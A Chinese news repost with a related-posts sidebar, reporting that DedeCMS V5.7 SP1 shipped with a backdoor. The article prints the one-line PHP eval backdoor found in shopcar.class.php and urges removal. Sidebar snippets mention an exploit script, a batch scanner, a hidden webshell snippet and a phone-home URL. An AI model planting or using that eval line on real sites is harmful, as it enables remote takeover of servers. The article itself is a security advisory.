Dedecms被曝疑似植入后门 可成功控制网站

最新推荐文章于 2022-03-09 15:42:59 发布
最新推荐文章于 2022-03-09 15:42:59 发布
阅读量179 收藏
点赞数
文章标签: php
原文链接:https://my.oschina.net/19737/blog/50508
版权

为什么80%的码农都做不了架构师?>>>   hot3.png

20号,著名开源建站软件Dedecms V5.7 SP1正式版被植入后门,通过该后门可成功入侵并控制使用dedecms的网站。

被植入的后门是在/include/shopcar.class.php文件中,被植入的代码为@eval(file_get_contents(‘php://input’));,乌云介绍称,通过该后门可成功入侵dedecms网站。有网友对植入的该后门予以证实,称其在2012-3-18 19:08下载的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代码。

据了解,@eval(file_get_contents(‘php://input’));是将请求的数据流作为脚本语言执行,通过该后门,可以上传PHP后门来控制整个网站。使用Dedecms V5.7 SP1正式版建站的站长,需立即对后门代码进行删除,以保护网站安全。

Dedecms是一款开源建站软件,其最早是由IT柏拉图个人开发,并在2007年进行了公司化运作。目前,国内有不少网站都使用了Dedecms系统,不过在Dedecms创始人IT柏拉图的离开后,Dedecms屡次被曝出安全漏洞问题。截至发稿,Dedecms官方尚未对该漏洞进行任何回应。

转载于:https://my.oschina.net/19737/blog/50508

weixin_33994444
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php上传后门,Dedecms疑似植入后门 上传PHP后门控制整个网站
weixin_28871989的博客
03-10 320
Admin5站长网2月21日消息,昨日乌云漏洞报告平台()发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms网站和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试,可以上传PHP后门控制整个网站。目前已经将该后门加入到webscan网站...
DedeCMS 5.7 后门漏洞
weixin_33895475的博客
03-21 592
简要描述: DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似植入一句话后门前几日下载并不存在此代码 详细说明: shopcar.class.php植入一句话@eval(file_get_contents('php://input')); 漏洞证明: shopcar.class.php植入一句话@eval(file_get_contents('php://input'...
dedecms官方后门获取你的站点信息
赵一舟的博客
03-09 341
$offUrl = "http://new"."ver.a"."pi.de"."decms.com/index.php?c=info57&version={$cfg_version}&formurl={$nurl}&phpver={$phpv}&os={$sp_os}&mysqlver={$mysql_ver}{$add_query}";
DEDECMS 5.7 后门 exp再修改版
收集盒 Book box
05-11 1193
别说明:在舞林给出的exp的基础上修改而来!使自定义目标网站和目录更方便。(http://forum.cnsec.org/thread-82493-1-1.html)     先前发的那个修改版由于时间仓促没写判断目标是否存在漏洞的代码,刚才补上了。 PS:代码写的太烂,英语没学过几个单词,让大家见笑了,发现程序的bug欢迎提醒我。另外,写这个代码出于学习PHP的目的,如果有人用代码造成任何后
DEDECMS重大漏洞可获最高管理权限 提醒站长及时升级修复.docx
09-26
DEDECMS漏洞的影响非常严重,攻击者可以获取网站后台最高管理权限,查看任何数据或添加恶意文件,从而导致网站数据泄露、网站瘫痪、恶意代码植入等严重后果。据了解,国内有超过35万个网站正在使用DEDECMS或者基于...
dedecms 网站地图插件
02-15
对于DedeCms的管理员来说,这是一项不可或缺的功能,尤其是那些希望提高网站流量和搜索引擎排名的站点。在使用过程中,需要注意定期更新网站地图,保持与网站内容的同步,同时根据搜索引擎的算法变化进行适当调整,...
ASP网站CMS程序源码——Dedecms v4.0视频教程实例开发.zip
10-17
【ASP网站CMS程序源码——Dedecms v4.0视频教程实例开发】 DedeCMS,全称“织梦内容管理系统”,是一款基于ASP(Active Server Pages)技术的开源网站内容管理软件。这个压缩包“ASP网站CMS程序源码——Dedecms v...
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
饮水器净水设备dedecms网站源码互联网+净水健康
06-24
"饮水器净水设备dedecms网站源码互联网+净水健康"这个标题揭示了几个关键点:首先,它涉及到的是一个基于互联网的网站项目,专门关注饮水器和净水设备;其次,该网站使用了织梦内容管理系统(DedeCMS)作为其后台...
dede amp lt php,一种奇特的DEDE隐藏后门办法
weixin_30160357的博客
03-24 169
一种独特的DEDE暗藏后门举措单位某站用的dedecms,即日被某黑阔getshell了,提交到了wooyun.为了复原黑阔入侵的本事,用鬼哥的getshell测试竟然没失利, 是不是getshell过一次,再次就不会失利呢?无法只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:Default{dede:php}file_put_...
一种奇特的DEDE隐藏后门办法
IT技术宅-北方的刀郎
03-21 2783
? 15:24 / 28一种奇特的DEDE隐藏后门办法单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun.为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:ortant; paddin
织梦DEDECMS去除一切自带后门和破绽的办法
PHP错误汇总
09-26 763
DEDECMS去除一切自带后门和破绽的办法 DEDECMS去除所有自带后门和漏洞的方法(DEDE安装之后需要做的事) Dedecms安全步骤,安装之后的操作 1 将文件夹dede改名为其他,比如 /dede58.com/ 2 搜索ad.dedecms.com,文件D:\WebSite\fukedh.com\www\gzadmin\templets\login_ad.htm 删除如下这一段: <!--<script type="text/javascript" src="<?ph
DEDECMS安装之后需要做的事情!DEDECMS去除所有自带后门和 漏洞的方法
热门推荐
____
04-20 1万+
Dedecms安全步骤,安装之后的操作   1 将文件夹dede改名为其他,比如 /fukedh.com/   2 搜索ad.dedecms.com,文件D:\WebSite\fukedh.com\www\gzadmin\templets\login_ad.htm 删除如下这一段: /dedecms/loginad..js">-->              3 继续搜
php exit dedecms,dedecms 去除一切自带后门和破绽的办法
weixin_35502173的博客
03-10 175
DEDECMS去除所有自带后门和漏洞的方法(DEDE安装之后需要做的事)Dedecms安全步骤,安装之后的操作1 将文件夹dede改名为其他,比如 /dedecms51.com/2 搜索ad.dedecms.com,文件D:\WebSite\fukedh.com\www\gzadmin\templets\login_ad.htm删除如下这一段:3 继续搜索ad.dedecms.com,文件 D:\...
Dedecms 生产环境安全设置
日拱一卒无有尽,功不唐捐终入海
08-25 996
Dedecms安全步骤,安装之后的操作 1 将文件夹dede改名为其他,比如 /fukedh.com/ 2 搜索ad.dedecms.com,文件D:\WebSite\fukedh.com\www\gzadmin\templets\login_ad.htm 删除如下这一段: /dedecms/loginad..js">-->           3 继续搜索ad.d
一种奇特的DEDE隐藏后门办法(dedecms漏洞90sec.php文件)
云度
10-18 7783
单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun. 为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢? 无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下: 1 {dede:php}file_put_c
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7969
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
使用DEDECMS快速搭建电影网站教程
"快速建电影站 - 手把手教你如何使用DEDECMS模板快速制作电影网站,适合初学者和快速建站需求者。通过修改DEDECMS v5.3的模板,实现电影信息的填空式填充,提高效率并保持页面美观。" 本文将详细介绍如何利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值